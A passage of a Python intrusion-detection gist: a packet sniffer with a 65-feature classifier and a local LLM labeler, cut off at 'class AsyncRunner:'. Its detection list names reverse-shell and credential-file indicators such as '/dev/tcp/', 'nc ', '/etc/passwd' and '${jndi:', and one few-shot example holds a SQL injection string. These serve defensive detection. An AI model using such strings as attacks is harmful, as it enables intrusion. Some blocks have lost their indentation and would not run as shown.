# simple-packet-sniffer.py
# Published as GitHub gist gary23w/3bbb51566a7ba1a7bbc1a7e2d384b8b6
# (author: @gary23w; gist last active June 16, 2026 21:59).
"""
simplepacketsniffer.py 0.5 -- single-file edition
Packet sniffer / lightweight IDS with deep protocol decoding (HTTP/DNS/TLS+JA3/
SMTP/SMB), TCP reassembly, file carving, YARA, heuristics, an ML fast-path, and
an on-device LLM analyst. The paid OpenAI dependency is replaced by a local
Qwen2.5 GGUF model (via llama-cpp-python) that auto-downloads and caches on first
run -- no API key, no network after caching.
Hybrid detection layer (see AI/ML section below):
* Heuristics + 65-feature RandomForest -> line-rate, deterministic
* Local LLM (Qwen2.5-3B) -> offline labeling + --expensive analysis (non-blocking)
On the built-in 38-sample corpus: heuristics-OR-LLM ensemble scores P/R/F1 = 1.00.
Install (pulls in the dependencies, including the llama-cpp-python CPU wheel,
plus Npcap on Windows):
    python simplepacketsniffer.py --install
Usage examples:
  Evaluate the AI layer (precision/recall on the labeled corpus; no capture):
    python simplepacketsniffer.py --eval
    (add --no-llm to skip the slow LLM rows)
  Sniffer (Protection) Mode -- ML fast-path; add --enforce to apply firewall rules:
    sudo python simplepacketsniffer.py --start --sentry --model-path model.pkl
  Expensive Mode (the local LLM analyzes every packet, off the capture thread):
    sudo python simplepacketsniffer.py --start --expensive [--llm-model qwen2.5-1.5b]
  Build a dataset auto-labeled by the LOCAL LLM, then train the fast-path:
    sudo python simplepacketsniffer.py --build-dataset --llm-label --num-samples 200 --start
    python simplepacketsniffer.py --train --dataset training_data.csv --model-path model.pkl
Block enforcement is OFF by default (alert-only). Pass --enforce to let the tool
modify the host firewall (netsh on Windows, iptables on Linux).
This file is self-contained for posting as a single gist. A logging.yaml is read
if present (the content is mirrored below); otherwise logging falls back to a
sane basic config.
***logging.yaml
version: 1
disable_existing_loggers: false
formatters:
  standard:
    format: '%(asctime)s - %(name)s - %(levelname)s - %(message)s'
  simple:
    format: '%(asctime)s - %(levelname)s - %(message)s'
handlers:
  console:
    class: logging.StreamHandler
    level: DEBUG
    formatter: standard
    stream: ext://sys.stdout
  file_handler:
    class: logging.handlers.RotatingFileHandler
    level: DEBUG
    formatter: standard
    filename: sniffer.log
    maxBytes: 1048576
    backupCount: 3
  flagged_ip_handler:
    class: logging.handlers.RotatingFileHandler
    level: WARNING
    formatter: standard
    filename: flagged_ips.log
    maxBytes: 1048576
    backupCount: 3
  dns_handler:
    class: logging.handlers.RotatingFileHandler
    level: INFO
    formatter: standard
    filename: dns_queries.log
    maxBytes: 1048576
    backupCount: 3
loggers:
  PacketSniffer:
    level: DEBUG
    handlers: [console, file_handler]
    propagate: no
  FlaggedIPLogger:
    level: WARNING
    handlers: [flagged_ip_handler, console]
    propagate: no
  DNSQueryLogger:
    level: INFO
    handlers: [dns_handler, console]
    propagate: no
root:
  level: DEBUG
  handlers: [console]
***
"""
from __future__ import annotations
import argparse
import asyncio
import logging
import logging.config
import subprocess
import sys
import platform
import re
import ipaddress
import time
import threading
import struct
import os
import csv
import string
import gzip
import zlib
import hashlib
import binascii
import shutil
import json
import math
import queue
from dataclasses import dataclass, field
from datetime import datetime, timezone
from collections import Counter
from collections import defaultdict, deque
from typing import Tuple, Dict, Any, List, Optional
try:
import aiohttp
except ImportError:
aiohttp = None
try:
import yaml
except ImportError:
yaml = None
try:
from cachetools import TTLCache
except ImportError:
TTLCache = None
try:
import numpy as np
except ImportError:
np = None
try:
import scapy.all as scapy
from scapy.all import sniff, Ether, IP, IPv6, TCP, UDP, ICMP, ARP, Raw
from scapy.layers.dns import DNS, DNSQR
except ImportError:
scapy = None
sniff = None
Ether = None
IP = None
IPv6 = None
TCP = None
UDP = None
ICMP = None
ARP = None
Raw = None
DNS = None
DNSQR = None
try:
from scapy.layers.tls.all import TLS, TLSClientHello, TLSHandshake
except ImportError:
TLS = None
TLSClientHello = None
TLSHandshake = None
try:
from openai import AsyncOpenAI
except ImportError:
AsyncOpenAI = None
try:
from llama_cpp import Llama, LlamaGrammar # local GGUF LLM runtime
except Exception:
Llama = None
LlamaGrammar = None
try:
from huggingface_hub import hf_hub_download # auto-download + cache models
except Exception:
hf_hub_download = None
os.environ.setdefault("HF_HUB_DISABLE_SYMLINKS_WARNING", "1")
try:
from bcc import BPF
except ImportError:
BPF = None
try:
import yara
except ImportError:
yara = None
# Module-level holder for the most recent XDP metadata record (None until set).
# NOTE(review): nothing in this section writes it; presumably the optional
# bcc/BPF (XDP) capture path assigns it -- confirm against the rest of the file.
last_xdp_metadata: Optional[Dict[str, Any]] = None
# ===========================================================================
# AI / ML detection layer (local, free) -- merged in for single-file gist.
#
# Two complementary classifiers replace the original 2-feature ML model and the
# paid OpenAI calls:
# * compute_feature_vector(): 65 deterministic byte/token features for the
#   line-rate RandomForest fast-path (see MLClassifier).
# * LocalLLMLabeler: a Qwen2.5 GGUF model run via llama-cpp-python that
#   auto-downloads/caches on first run and emits structured JSON verdicts.
# ===========================================================================
# --- Feature extraction ---------------------------------------------------- #
# Attack-syntax / tooling indicators. compute_feature_vector() tests each token
# as a substring of payload.lower(), so every token here must be lowercase.
# Each entry contributes one 0/1 feature named by its second element.
ATTACK_TOKENS = [
    (b"union select", "tok_union_select"), (b"select ", "tok_select"),
    (b"' or ", "tok_or_inject"), (b"or 1=1", "tok_or_1eq1"),
    (b"sleep(", "tok_sleep"), (b"--", "tok_sql_comment"),
    (b"<script", "tok_script"), (b"onerror=", "tok_onerror"),
    (b"javascript:", "tok_js_uri"), (b"../", "tok_dotdot"),
    (b"..%2f", "tok_dotdot_enc"), (b"/etc/passwd", "tok_passwd"),
    (b"cmd.exe", "tok_cmdexe"), (b"/bin/sh", "tok_binsh"),
    (b"/bin/bash", "tok_binbash"), (b"powershell", "tok_powershell"),
    (b"-enc ", "tok_ps_enc"), (b"${jndi:", "tok_jndi"),
    (b"/dev/tcp/", "tok_devtcp"), (b"nc ", "tok_netcat"),
    (b"<?php", "tok_php"), (b"system(", "tok_system"),
    (b"eval(", "tok_eval"), (b"base64", "tok_base64"),
    (b"\x90\x90\x90\x90", "tok_nopsled"), (b"eicar-standard", "tok_eicar"),
    (b"sqlmap", "tok_sqlmap"), (b"nikto", "tok_nikto"),
    (b"%00", "tok_nullbyte_enc"), (b";", "tok_semicolon"), (b"|", "tok_pipe"),
]
# File-format magic numbers. Each is a 0/1 feature, set when the signature occurs
# anywhere in the first 64 payload bytes (case-sensitive).
_MAGIC_FLAGS = [
    (b"MZ", "magic_pe"), (b"\x7fELF", "magic_elf"), (b"%PDF-", "magic_pdf"),
    (b"PK\x03\x04", "magic_zip"), (b"\xff\xd8\xff", "magic_jpeg"),
    (b"\x89PNG", "magic_png"), (b"\xfeSMB", "magic_smb2"), (b"\xffSMB", "magic_smb1"),
]
# Names of the 10 scalar features, in the exact order compute_feature_vector() emits them.
_STRUCTURAL = [
    "log_len", "entropy", "printable_ratio", "whitespace_ratio", "digit_ratio",
    "letter_ratio", "nonascii_ratio", "null_ratio", "longest_printable_run",
    "unique_byte_ratio",
]
# 16-bin histogram over the high nibble (byte >> 4) of each payload byte.
_HIST = [f"hist_{i}" for i in range(16)]
# Complete ordered feature schema: 10 structural + 16 histogram + 31 token + 8 magic = 65.
# A trained model depends on this order; append new features, never reorder.
FEATURE_NAMES: List[str] = (
    _STRUCTURAL + _HIST
    + [name for _, name in ATTACK_TOKENS]
    + [name for _, name in _MAGIC_FLAGS]
)
N_FEATURES = len(FEATURE_NAMES)
def shannon_entropy(payload: bytes) -> float:
    """Return the Shannon entropy of *payload* in bits per byte.

    For byte input the result lies in [0.0, 8.0]; an empty payload yields 0.0.
    The result is never negative zero.
    """
    if not payload:
        return 0.0
    total = len(payload)
    entropy = -sum((c / total) * math.log2(c / total) for c in Counter(payload).values())
    # With a single distinct byte value the sum is 0.0 and its negation is -0.0,
    # which formats as "-0.00". Every term p*log2(p) is <= 0, so abs() only
    # normalizes that sign and never alters a real value.
    return abs(entropy)
def _longest_printable_run(payload: bytes) -> int:
best = cur = 0
for b in payload:
if 32 <= b < 127:
cur += 1
best = max(best, cur)
else:
cur = 0
return best
def compute_feature_vector(payload: bytes) -> List[float]:
    """Return a fixed-length feature vector (len == N_FEATURES) for *payload*.

    Layout, matching FEATURE_NAMES:
      * 10 structural values: log1p(length), Shannon entropy, the fractions of
        printable / whitespace / digit / letter / non-ASCII / NUL bytes,
        longest printable run divided by length, distinct bytes / 256;
      * 16 high-nibble histogram bins, each normalized by length;
      * one 0.0/1.0 flag per ATTACK_TOKENS entry (substring of payload.lower());
      * one 0.0/1.0 flag per _MAGIC_FLAGS entry found in the first 64 bytes.
    An empty payload yields all zeros.
    """
    size = len(payload)
    if not size:
        return [0.0] * N_FEATURES
    freq = Counter(payload)

    def tally(byte_values) -> int:
        # Counter returns 0 for absent keys without inserting them.
        return sum(freq[v] for v in byte_values)

    letter_count = tally(range(65, 91)) + tally(range(97, 123))
    structural = [
        math.log1p(size),
        shannon_entropy(payload),
        tally(range(32, 127)) / size,
        tally((9, 10, 13, 32)) / size,
        tally(range(48, 58)) / size,
        letter_count / size,
        tally(range(128, 256)) / size,
        freq[0] / size,
        _longest_printable_run(payload) / size,
        len(freq) / 256.0,
    ]

    buckets = [0] * 16
    for value, count in freq.items():
        buckets[value >> 4] += count
    histogram = [bucket / size for bucket in buckets]

    lowered = payload.lower()
    head = payload[:64]
    token_flags = [float(token in lowered) for token, _ in ATTACK_TOKENS]
    magic_flags = [float(sig in head) for sig, _ in _MAGIC_FLAGS]
    return structural + histogram + token_flags + magic_flags
# --- Local LLM labeler ----------------------------------------------------- #
@dataclass(frozen=True)
class ModelSpec:
    """Immutable description of one downloadable GGUF model preset."""
    key: str       # short preset name; also its key in MODEL_REGISTRY
    repo_id: str   # Hugging Face repository id passed to hf_hub_download()
    filename: str  # GGUF file within that repository
    note: str      # human-readable size / quality remark
# Selectable local model presets, keyed by ModelSpec.key. LocalLLMLabeler looks
# its model_key up here when no existing model_path is supplied. Sizes in the
# notes are approximate.
MODEL_REGISTRY: Dict[str, ModelSpec] = {
    "qwen2.5-3b": ModelSpec("qwen2.5-3b", "Qwen/Qwen2.5-3B-Instruct-GGUF",
                            "qwen2.5-3b-instruct-q4_k_m.gguf",
                            "Default. ~2GB. Best quality/speed balance on CPU."),
    "qwen2.5-1.5b": ModelSpec("qwen2.5-1.5b", "Qwen/Qwen2.5-1.5B-Instruct-GGUF",
                              "qwen2.5-1.5b-instruct-q4_k_m.gguf",
                              "~1GB. Faster, lower accuracy."),
    "qwen2.5-0.5b": ModelSpec("qwen2.5-0.5b", "Qwen/Qwen2.5-0.5B-Instruct-GGUF",
                              "qwen2.5-0.5b-instruct-q4_k_m.gguf",
                              "~0.4GB. Smoke-test / very low-resource only."),
}
# Preset used when the caller does not choose one.
DEFAULT_MODEL_KEY = "qwen2.5-3b"
# Canonical category labels. _normalize_category() maps free-form LLM output onto
# this list ("other" is the catch-all), and the optional GBNF grammar restricts
# the category field to exactly these strings.
CATEGORIES = [
    "benign", "sqli", "xss", "command_injection", "path_traversal", "shellcode",
    "malware_download", "c2_beacon", "dga", "data_exfil", "exploit",
    "recon_scan", "credential_theft", "other",
]
# System message sent ahead of the FEWSHOT turns on every classify_context() call.
# It does not enumerate CATEGORIES, so the model may answer with free-form
# categories; those are normalized by _normalize_category().
SYSTEM_PROMPT = (
    "You are a senior network-intrusion-detection analyst. You are given one "
    "decoded network flow/packet and must judge it ONLY on the concrete "
    "evidence shown. Output one JSON object: verdict (malicious|suspicious|"
    "benign), confidence in [0,1], the single best category, and a short reason.\n"
    "\n"
    "DECISION RULES -- follow exactly:\n"
    "1. Default to benign. Flag malicious ONLY when the decoded content itself "
    "contains a concrete attack artifact (injection syntax, traversal sequence, "
    "exploit string, shellcode bytes, executable magic being downloaded, etc.).\n"
    "2. HIGH ENTROPY IS NORMAL. TLS/SSL handshakes and encrypted records, "
    "compressed bodies (gzip), images, video, NTP and other binary protocol "
    "headers are SUPPOSED to look random or contain null bytes. Never call "
    "something malicious merely because entropy is high or bytes are non-text.\n"
    "3. You have NO threat-intelligence feed. Do NOT claim a domain or IP is "
    "'known malicious'. A DNS query to a normal-looking domain "
    "(google.com, outlook.office365.com, *.cloudflare.net, cdn/update hosts) "
    "is benign. Only flag a domain as DGA when the leftmost label is long "
    "(>=12 chars) AND looks random/algorithmic (few vowels, mixed digits/"
    "consonants) -- then it is malicious (category dga), confidence >= 0.8.\n"
    "4. Authentication is not an attack. Bearer/JWT tokens, Authorization "
    "headers, and login forms with username/password fields are benign unless "
    "the values literally contain injection syntax (' OR 1=1, UNION SELECT, etc).\n"
    "5. Apply the DGA test to EVERY DNS query, even when the format looks like a "
    "'standard query'. Compute whether the leftmost label is long (>=12 chars) "
    "and unpronounceable (vowel ratio < 0.3, or random digit/consonant mix). If "
    "so it is malicious (dga). Do not dismiss it just because the query is "
    "well-formed.\n"
    "6. Attack-tooling fingerprints are malicious recon_scan (confidence >= 0.8): "
    "User-Agent or content mentioning sqlmap, nikto, nmap, masscan, dirbuster, "
    "gobuster, hydra, or acunetix indicates active scanning/exploitation.\n"
    "7. Use 'suspicious' sparingly, only for genuinely ambiguous evidence; do "
    "not use it as a hedge for normal traffic.\n"
    "Respond with one JSON object only."
)
# (user, assistant) example pairs replayed as chat turns before every query.
# The user side mirrors LocalLLMLabeler.build_context() formatting; the assistant
# side shows the exact JSON shape expected back.
FEWSHOT = [
    ("Protocol: tls\nPayload entropy (0-8): 7.20\n"
     "Payload (hex, first 160 chars): 16030100200100...",
     '{"verdict":"benign","confidence":0.95,"category":"benign",'
     '"reason":"TLS ClientHello handshake; high entropy is expected for TLS."}'),
    ("Protocol: dns\nPayload (text, first 400 chars):\n"
     "standard query A outlook.office365.com",
     '{"verdict":"benign","confidence":0.97,"category":"benign",'
     '"reason":"DNS lookup of a legitimate Microsoft service domain."}'),
    ("Protocol: http1\nPayload (text, first 400 chars):\n"
     "POST /login HTTP/1.1\\r\\nHost: shop.com\\r\\n\\r\\n"
     "username=john&password=hunter2",
     '{"verdict":"benign","confidence":0.93,"category":"benign",'
     '"reason":"Ordinary login form post; credential fields are not injection."}'),
    ("Protocol: http1\nPayload (text, first 400 chars):\n"
     "GET /product?id=1 UNION SELECT username,password FROM users-- HTTP/1.1",
     '{"verdict":"malicious","confidence":0.98,"category":"sqli",'
     '"reason":"UNION SELECT against users table is a SQL injection."}'),
    ("Protocol: dns\nPayload (text, first 400 chars):\n"
     "standard query A kq3v9z7xj1n4plw8d2rmh.biz",
     '{"verdict":"malicious","confidence":0.85,"category":"dga",'
     '"reason":"Long random high-consonant label is a DGA C2 domain."}'),
    ("Protocol: http1\nPayload (text, first 400 chars):\n"
     "GET /?id=1 HTTP/1.1\\r\\nHost: x.com\\r\\nUser-Agent: sqlmap/1.6.12",
     '{"verdict":"malicious","confidence":0.9,"category":"recon_scan",'
     '"reason":"sqlmap User-Agent indicates active SQL-injection scanning."}'),
]
# Lowercase free-form category phrases -> canonical CATEGORIES entry.
# _normalize_category() tries exact keys first, then scans this dict in insertion
# order for fuzzy matches, so earlier aliases take precedence over later ones.
_CATEGORY_ALIASES = {
    "sql injection": "sqli", "sql_injection": "sqli", "sqli": "sqli",
    "cross-site scripting": "xss", "cross site scripting": "xss", "xss": "xss",
    "command injection": "command_injection", "rce": "command_injection",
    "remote code execution": "command_injection", "os command injection": "command_injection",
    "directory traversal": "path_traversal", "path traversal": "path_traversal",
    "lfi": "path_traversal", "shellcode": "shellcode", "exploit": "exploit",
    "buffer overflow": "exploit", "malware": "malware_download",
    "malware download": "malware_download", "malware/pe downloads": "malware_download",
    "pe download": "malware_download", "trojan": "malware_download",
    "c2": "c2_beacon", "c2 beacon": "c2_beacon", "command and control": "c2_beacon",
    "beacon": "c2_beacon", "dga": "dga", "domain generation algorithm": "dga",
    "data exfiltration": "data_exfil", "exfiltration": "data_exfil",
    "data exfil": "data_exfil", "recon": "recon_scan", "scan": "recon_scan",
    "reconnaissance": "recon_scan", "port scan": "recon_scan",
    "credential theft": "credential_theft", "credential": "credential_theft",
    "phishing": "credential_theft", "benign": "benign", "normal": "benign",
    "none": "benign", "": "benign",
}
def _normalize_category(value: str) -> str:
    """Map a free-form category string from the LLM onto a CATEGORIES entry.

    Resolution order:
      1. exact canonical name;
      2. exact alias key in _CATEGORY_ALIASES;
      3. the first alias (dict order) found in *value* starting at a word
         boundary, so "port scanning" maps to recon_scan while "brute force"
         does not trip the "rce" alias;
      4. the first canonical name occurring anywhere as a substring;
      5. "other".
    """
    v = value.lower().strip()
    if v in CATEGORIES:
        return v
    if v in _CATEGORY_ALIASES:
        return _CATEGORY_ALIASES[v]
    for alias, canon in _CATEGORY_ALIASES.items():
        # The alias must begin a word: short aliases such as "rce", "c2" and
        # "normal" otherwise match inside unrelated words ("force", "source",
        # "ec2", "abnormal"). Suffixes are still allowed ("scanning", "trojans").
        if alias and re.search(r"(?<![a-z0-9])" + re.escape(alias), v):
            return canon
    for canon in CATEGORIES:
        if canon != "other" and canon in v:
            return canon
    return "other"
@dataclass
class LabelResult:
    """Outcome of one local-LLM classification.

    ``label`` is the binary training label (1 = attack). ``error`` is set when
    the model was unavailable, inference failed or the reply could not be
    parsed. ``raw`` keeps the model's unparsed reply text.
    """
    verdict: str = "benign"
    confidence: float = 0.0
    category: str = "benign"
    reason: str = ""
    label: int = 0
    error: Optional[str] = None
    raw: str = ""

    def to_dict(self) -> Dict[str, Any]:
        """Return the public fields as a plain dict; ``raw`` is not included."""
        exported = ("verdict", "confidence", "category", "reason", "label", "error")
        return {name: getattr(self, name) for name in exported}
class LocalLLMLabeler:
    """Lazy-loaded, thread-safe, cached local GGUF LLM classifier.

    The GGUF weights are resolved on first use: an existing ``model_path`` wins;
    otherwise the MODEL_REGISTRY entry for ``model_key`` is fetched (and cached)
    with ``hf_hub_download``. They are then loaded with ``llama_cpp.Llama``.
    Loading is guarded by its own lock, so concurrent first callers load the
    model only once. Inference and cache writes are serialized by ``_lock``.
    Verdicts are cached by the SHA-1 of the prompt context; once more than
    ``cache_size`` are stored, the oldest entry is evicted.
    """

    def __init__(self, model_key: str = DEFAULT_MODEL_KEY, model_path: Optional[str] = None,
                 n_ctx: int = 4096, n_threads: Optional[int] = None,
                 suspicious_threshold: float = 0.5, cache_size: int = 4096,
                 use_grammar: bool = False, logger: Optional[logging.Logger] = None) -> None:
        self.logger = logger or logging.getLogger(__name__)
        self.model_key = model_key
        self.model_path = model_path
        self.n_ctx = n_ctx
        self.n_threads = n_threads or (os.cpu_count() or 4)
        # A "suspicious" verdict becomes label 1 at or above this confidence.
        self.suspicious_threshold = suspicious_threshold
        # GBNF grammar sampling crashes in some llama-cpp-python Windows builds;
        # json_object mode is reliable, so grammar is opt-in.
        self.use_grammar = use_grammar
        self._llm = None
        self._grammar = None
        self._lock = threading.Lock()       # serializes inference and cache writes
        self._load_lock = threading.Lock()  # makes the lazy model load happen once
        self._cache: "Dict[str, LabelResult]" = {}
        self._cache_order: deque = deque()  # insertion order, for FIFO eviction
        self._cache_size = cache_size
        self._load_error: Optional[str] = None

    def resolve_model_path(self) -> str:
        """Return a local filesystem path to the GGUF weights.

        An existing ``model_path`` is returned as-is. Otherwise ``model_key`` is
        looked up in MODEL_REGISTRY and downloaded/cached via ``hf_hub_download``.

        Raises:
            RuntimeError: huggingface_hub is not installed or the key is unknown.
        """
        if self.model_path:
            if os.path.exists(self.model_path):
                return self.model_path
            # Surface a mistyped path instead of silently downloading the registry model.
            self.logger.warning("Model path %s does not exist; falling back to registry model '%s'.",
                                self.model_path, self.model_key)
        if hf_hub_download is None:
            raise RuntimeError("huggingface_hub not installed; cannot fetch model.")
        spec = MODEL_REGISTRY.get(self.model_key)
        if spec is None:
            raise RuntimeError(f"Unknown model key '{self.model_key}'.")
        self.logger.info("Resolving local model %s (%s/%s) -- downloads & caches on first run...",
                         spec.key, spec.repo_id, spec.filename)
        path = hf_hub_download(repo_id=spec.repo_id, filename=spec.filename)
        self.logger.info("Model ready at %s", path)
        return path

    def _ensure_loaded(self) -> bool:
        """Load the model on first use; return True once it is ready.

        A failure is recorded in ``_load_error`` and is not retried on later calls.
        """
        if self._llm is not None:
            return True
        if self._load_error is not None:
            return False
        with self._load_lock:
            # Another thread may have finished (or failed) loading while we waited.
            if self._llm is not None:
                return True
            if self._load_error is not None:
                return False
            if Llama is None:
                self._load_error = "llama_cpp not installed"
                self.logger.error("Local LLM unavailable: %s", self._load_error)
                return False
            try:
                path = self.resolve_model_path()
                llm = Llama(model_path=path, n_ctx=self.n_ctx,
                            n_threads=self.n_threads, verbose=False)
                if self.use_grammar and LlamaGrammar is not None:
                    try:
                        self._grammar = LlamaGrammar.from_string(_GRAMMAR)
                    except Exception as exc:
                        self.logger.warning("Failed to compile GBNF grammar: %s", exc)
                        self._grammar = None
                # Publish the model last: the lock-free fast path above must not
                # see a model whose grammar decision has not been made yet.
                self._llm = llm
                self.logger.info("Local LLM loaded (%s, %d threads, ctx=%d).",
                                 self.model_key, self.n_threads, self.n_ctx)
                return True
            except Exception as exc:
                self._load_error = str(exc)
                self.logger.error("Failed to load local LLM: %s", exc)
                return False

    @property
    def available(self) -> bool:
        """True if the model is (or could now be) loaded; triggers loading."""
        return self._ensure_loaded()

    def warmup(self) -> bool:
        """Load the model eagerly; return whether it is ready."""
        return self._ensure_loaded()

    @staticmethod
    def build_context(*, summary: str = "", protocol: str = "", src: str = "", dst: str = "",
                      normalized_payload: str = "", hex_payload: str = "",
                      signatures: Optional[list] = None, entropy: Optional[float] = None,
                      sni: str = "", ja3: str = "", extra: str = "") -> str:
        """Render the non-empty evidence fields as the user prompt text.

        Text payload is truncated to 400 characters and hex payload to 160.
        Returns "(empty payload)" when every field is empty.
        """
        parts = []
        if summary:
            parts.append(f"Summary: {summary}")
        if protocol:
            parts.append(f"Protocol: {protocol}")
        if src or dst:
            parts.append(f"Flow: {src} -> {dst}")
        if sni:
            parts.append(f"TLS SNI: {sni}")
        if ja3:
            parts.append(f"JA3: {ja3}")
        if entropy is not None:
            parts.append(f"Payload entropy (0-8): {entropy:.2f}")
        if signatures:
            parts.append(f"Signature hits: {signatures}")
        if normalized_payload:
            parts.append(f"Payload (text, first 400 chars):\n{normalized_payload[:400]}")
        if hex_payload:
            parts.append(f"Payload (hex, first 160 chars): {hex_payload[:160]}")
        if extra:
            parts.append(extra)
        return "\n".join(parts) if parts else "(empty payload)"

    def _cache_key(self, context: str) -> str:
        return hashlib.sha1(context.encode("utf-8", "ignore")).hexdigest()

    def _cache_put(self, key: str, result: LabelResult) -> None:
        """Insert *result* unless present; evict the oldest entry beyond capacity."""
        if key in self._cache:
            return
        self._cache[key] = result
        self._cache_order.append(key)
        if len(self._cache_order) > self._cache_size:
            self._cache.pop(self._cache_order.popleft(), None)

    def classify_context(self, context: str, max_tokens: int = 160) -> LabelResult:
        """Classify a prompt context; return a (possibly cached) LabelResult.

        Load and inference failures are returned as a LabelResult with ``error``
        set (and are not cached) rather than raised.
        """
        key = self._cache_key(context)
        cached = self._cache.get(key)
        if cached is not None:
            return cached
        if not self._ensure_loaded():
            return LabelResult(error=self._load_error or "model unavailable")
        messages = [{"role": "system", "content": SYSTEM_PROMPT}]
        for user_ex, assistant_ex in FEWSHOT:
            messages.append({"role": "user", "content": user_ex})
            messages.append({"role": "assistant", "content": assistant_ex})
        messages.append({"role": "user", "content": context +
                         '\n\nRespond as JSON: {"verdict": "...", "confidence": 0.0, '
                         '"category": "...", "reason": "..."}'})
        kwargs: Dict[str, Any] = dict(messages=messages, max_tokens=max_tokens, temperature=0.0)
        if self._grammar is not None:
            kwargs["grammar"] = self._grammar
        else:
            kwargs["response_format"] = {"type": "json_object"}
        with self._lock:
            # Another thread may have classified this exact context while we waited.
            cached = self._cache.get(key)
            if cached is not None:
                return cached
            try:
                out = self._llm.create_chat_completion(**kwargs)
                text = out["choices"][0]["message"]["content"].strip()
            except Exception as exc:
                self.logger.exception("Local LLM inference error: %s", exc)
                return LabelResult(error=str(exc))
            result = self._parse(text)
            self._cache_put(key, result)
        return result

    def _parse(self, text: str) -> LabelResult:
        """Turn the model's reply into a LabelResult, tolerating sloppy JSON.

        Falls back to the outermost {...} span when the whole reply is not JSON.
        Off-list verdicts are coerced: a "not"/"non" prefix means benign,
        otherwise "malic..." -> malicious, "suspic..." -> suspicious, else
        benign. Confidence is clamped to [0, 1] (NaN becomes 0.0).
        """
        raw = text
        data: Optional[Dict[str, Any]] = None
        try:
            data = json.loads(text)
        except Exception:
            start, end = text.find("{"), text.rfind("}")
            if start != -1 and end > start:
                try:
                    data = json.loads(text[start:end + 1])
                except Exception:
                    data = None
        if not isinstance(data, dict):
            return LabelResult(error="unparseable", raw=raw)
        verdict = str(data.get("verdict", "benign")).lower().strip()
        if verdict not in ("malicious", "suspicious", "benign"):
            if verdict.startswith(("not", "non")):
                verdict = "benign"        # "not malicious", "non-malicious", ...
            elif "malic" in verdict:
                verdict = "malicious"
            elif "suspic" in verdict:
                verdict = "suspicious"
            else:
                verdict = "benign"
        try:
            confidence = float(data.get("confidence", 0.0))
        except (TypeError, ValueError, OverflowError):
            confidence = 0.0
        if math.isnan(confidence):
            confidence = 0.0  # min/max would otherwise turn NaN into 1.0
        confidence = max(0.0, min(1.0, confidence))
        category = _normalize_category(str(data.get("category", "other")))
        reason = str(data.get("reason", ""))[:300]
        if verdict == "malicious":
            label = 1
        elif verdict == "suspicious":
            label = 1 if confidence >= self.suspicious_threshold else 0
        else:
            label = 0
        return LabelResult(verdict=verdict, confidence=confidence, category=category,
                           reason=reason, label=label, raw=raw)

    def label(self, **context_kwargs) -> LabelResult:
        """Shortcut: build_context(**context_kwargs) then classify_context()."""
        return self.classify_context(self.build_context(**context_kwargs))
# Optional GBNF grammar (opt-in; crashes the sampler on some Windows builds).
# LocalLLMLabeler compiles it only when use_grammar=True and LlamaGrammar is
# importable. It pins the reply to the four-key JSON object, with verdict and
# category restricted to the listed values and confidence in [0, 1].
_VERDICT_ALT = " | ".join(f'"\\"{v}\\""' for v in ("malicious", "suspicious", "benign"))
_CATEGORY_ALT = " | ".join(f'"\\"{c}\\""' for c in CATEGORIES)
# GBNF only allows line breaks between rules or inside parentheses, so the
# multi-line root sequence is wrapped in ( ... ). String characters exclude raw
# control bytes (as llama.cpp's json.gbnf does), which json.loads rejects.
# "{{" / "}}" are f-string escapes for literal braces.
_GRAMMAR = rf"""
root ::= (
  "{{" ws "\"verdict\"" ws ":" ws verdict ws "," ws
  "\"confidence\"" ws ":" ws number ws "," ws
  "\"category\"" ws ":" ws category ws "," ws
  "\"reason\"" ws ":" ws string ws "}}"
)
verdict ::= {_VERDICT_ALT}
category ::= {_CATEGORY_ALT}
number ::= ("0" ("." [0-9]+)?) | ("1" ("." "0"+)?)
string ::= "\"" char* "\""
char ::= [^"\\\x7F\x00-\x1F] | "\\" ["\\/bfnrt]
ws ::= [ \t\n]*
"""
# Process-wide labeler managed by get_labeler(); guarded by _LLM_SINGLETON_LOCK.
_LLM_SINGLETON: Optional[LocalLLMLabeler] = None
_LLM_SINGLETON_LOCK = threading.Lock()
def get_labeler(model_key: str = DEFAULT_MODEL_KEY, model_path: Optional[str] = None,
                logger: Optional[logging.Logger] = None, **kwargs) -> LocalLLMLabeler:
    """Return the process-wide LocalLLMLabeler, creating it on the first call.

    Only the first call's arguments are used; every later call returns that
    same instance, so the sniffer loads the model once.
    """
    global _LLM_SINGLETON
    with _LLM_SINGLETON_LOCK:
        labeler = _LLM_SINGLETON
        if labeler is None:
            labeler = LocalLLMLabeler(model_key=model_key, model_path=model_path,
                                      logger=logger, **kwargs)
            _LLM_SINGLETON = labeler
    return labeler
def setup_logging(config_file: str = "logging.yaml") -> None:
    """Configure logging from a YAML dictConfig file, falling back to basicConfig.

    stdout and stderr are first switched to UTF-8 with ``errors="replace"``
    (best effort, each stream independently), presumably so arbitrary decoded
    packet text can be printed. The config file is optional: when it does not
    exist, a basic INFO-level config is used without a warning. Any other
    failure (PyYAML missing, bad YAML, invalid dictConfig) also falls back,
    but logs a warning.
    """
    for stream in (sys.stdout, sys.stderr):
        try:
            if hasattr(stream, "reconfigure"):
                stream.reconfigure(encoding="utf-8", errors="replace")
        except Exception:
            pass  # best effort; keep the stream's existing encoding

    def _basic() -> None:
        logging.basicConfig(
            level=logging.INFO,
            format="%(asctime)s - %(levelname)s - %(message)s"
        )

    if not os.path.isfile(config_file):
        _basic()
        logging.getLogger(__name__).debug(
            "No logging config at %s; using basic config.", config_file
        )
        return
    try:
        if yaml is None:
            raise ImportError("PyYAML is not installed")
        with open(config_file, "r", encoding="utf-8") as f:
            config = yaml.safe_load(f)
        logging.config.dictConfig(config)
    except Exception as e:
        _basic()
        logging.getLogger(__name__).warning(
            "Failed to load logging config from %s, using basic config: %s",
            config_file, e
        )
def check_packet_capture_backend(logger: Optional[logging.Logger] = None) -> Tuple[bool, str]:
    """Report whether Scapy can capture packets on this host.

    Returns ``(True, "")`` when capture looks possible, otherwise
    ``(False, <human-readable reason>)``. On Windows it additionally requires
    Scapy to be using a pcap backend (Npcap/WinPcap) with a usable L2 listener.
    """
    logger = logger or logging.getLogger(__name__)  # accepted for API symmetry; unused
    if scapy is None:
        return False, "Scapy is not installed. Run with --install first."
    if os.name != "nt":
        return True, ""
    conf = scapy.conf
    pcap_enabled = bool(getattr(conf, "use_pcap", False))
    listener = str(getattr(conf, "L2listen", ""))
    listener_missing = ("_NotAvailableSocket" in listener
                        or "wpcap.dll missing" in listener.lower())
    if pcap_enabled and not listener_missing:
        return True, ""
    return (
        False,
        "Npcap/WinPcap is not installed or not available. Install Npcap from https://npcap.com/ and rerun."
    )
class AsyncRunner:
